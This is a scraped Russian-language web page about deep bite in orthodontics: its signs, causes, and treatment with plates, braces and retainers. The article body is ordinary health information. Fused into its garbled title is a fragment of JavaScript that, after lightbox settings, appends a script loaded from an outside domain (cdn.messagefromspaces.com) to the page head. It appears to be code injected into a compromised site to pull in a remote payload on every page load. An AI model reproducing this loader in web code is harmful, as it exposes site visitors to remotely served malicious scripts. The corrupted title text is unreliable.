--> Глубокий прикус - описание и причины возниконвения , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Глубокий прикус — описание и причины появления

1 Star2 Stars3 Stars4 Stars5 Stars (6 голосов, средняя оценка: 5,00 из 5)
Loading ... Loading ...

Глубокий прикус - фото

Глубокий прикус является неправильным и характеризуется в первую очередь глубоким перекрытием нижних резцов верхними (более чем на 2/3 высоты коронки зуба). Его синонимы:

  • глубокое резцовое перекрытие;
  • снижающийся прикус;
  • травмирующий прикус.

Глубокий прикус может сочетаться с другими видами прикуса, например, дистальным, мезиальным или нейтральным. В зависимости от того, с каким видом прикуса он сочетается, будут характерны те или иные проявления.

Часто у людей с глубоким прикусом укорочена нижняя часть лица, нижняя губа утолщена, имеется выраженное углубление подбородочной складки.

А что же во рту? При сочетании с нейтральным или дистальным прикусами нижние резцы могут упираться не в нёбную поверхность верхних резцов, как положено, а в слизистую оболочку твёрдого нёба, тем самым травмируя его. В комбинации с мезиальным прикусом будет иметь место так называемое «обратное резцовое перекрытие», причём глубокое, раз уж мы говорим о глубоком прикусе. Это значит, что нижние резцы перекрывают верхние более чем на 2/3 высоты их коронок.

Причины возникновения глубокого прикуса могут быть абсолютно разные:

  1. Чаще всего это кариес боковых зубов, ранняя потеря молочных боковых зубов или первых моляров, так называемых «шестёрок».
  2. Нарушение функций дыхания, глотания, речи.
  3. Вредные привычки (сосание и прикусывание пальцев, ручек, карандашей; подсасывание щёк и другое).
  4. Нарушение сроков прорезывания постоянных зубов, последовательности смены молочных верхних и нижних зубов и другое.

Как исправляют глубокий прикус?

Метод лечения глубокого прикуса зависит от возраста пациента и, конечно же, от того с каким видом прикуса он сочетается.

Что касается детского возраста, то здесь в первую очередь необходимо устранить все возможные причины возникновения глубокого прикуса (вылечить кариес, устранить вредные привычки, нормализовать функции, приучать детей к откусыванию и жеванию твёрдой пищи, при ранней потере молочных зубов заместить их протезами и т.д.).

Ортодонтические аппараты (пластинки) врач предложит ребёнку только в определённые периоды, а не сразу после обращения за помощью. Часто родители удивлены, почему они привели ребёнка к ортодонту и вместо ожидаемой пластинки им предложили посетить логопеда, полечить зубы, грызть больше морковки и т.д., а пластинку пообещали надеть где-то через полгода-год, а то и больше. Многие не только молча удивляются, но и громко возмущаются, мол, почему не хотите лечить моего ребёнка.

На самом деле, всё вышеперечисленное – это тоже лечение и без старательного выполнения предписаний доктора можно так и не достичь успеха в лечении. А пластинки надеваются в определённые возрастные периоды, например, когда прорезываются «шестёрки» (5,5 – 8 лет), премоляры, клыки и седьмые зубы (9 – 12 лет). В скобках указан средний возраст. Для каждого пациента он свой и определит его врач по клинической картине во рту у пациента, а также по снимкам. Главное с точностью выполнять все рекомендации врача-ортодонта и вовремя приходить на контрольные осмотры, чтобы не упустить тот момент, когда действительно будет необходимо надеть ортодонтический аппарат.

Для лечения глубокого прикуса у взрослых пациентов наиболее целесообразно будет использовать брекет-систему. Какие это будут брекеты (традиционные, лингвальные, самолигирующиеся, металлические, керамические и т.д.) по большому счёту не важно. Выбор за Вами.

После проведенного лечения Вас ожидает ещё ретенционный период, т.е. период, когда необходимо будет носить специальные аппараты для удержания зубов на своём новом месте. Это могут быть обычные съёмные пластинки (их носят на ночь) или несъёмные ретейнеры, которые крепятся на внутренней поверхности зубов на специальный материал.

Продолжительность этого периода индивидуальна, но в среднем примерно столько же, сколько длилось само ортодонтическое лечение (обычно 1 – 2 года).


 

Комментировать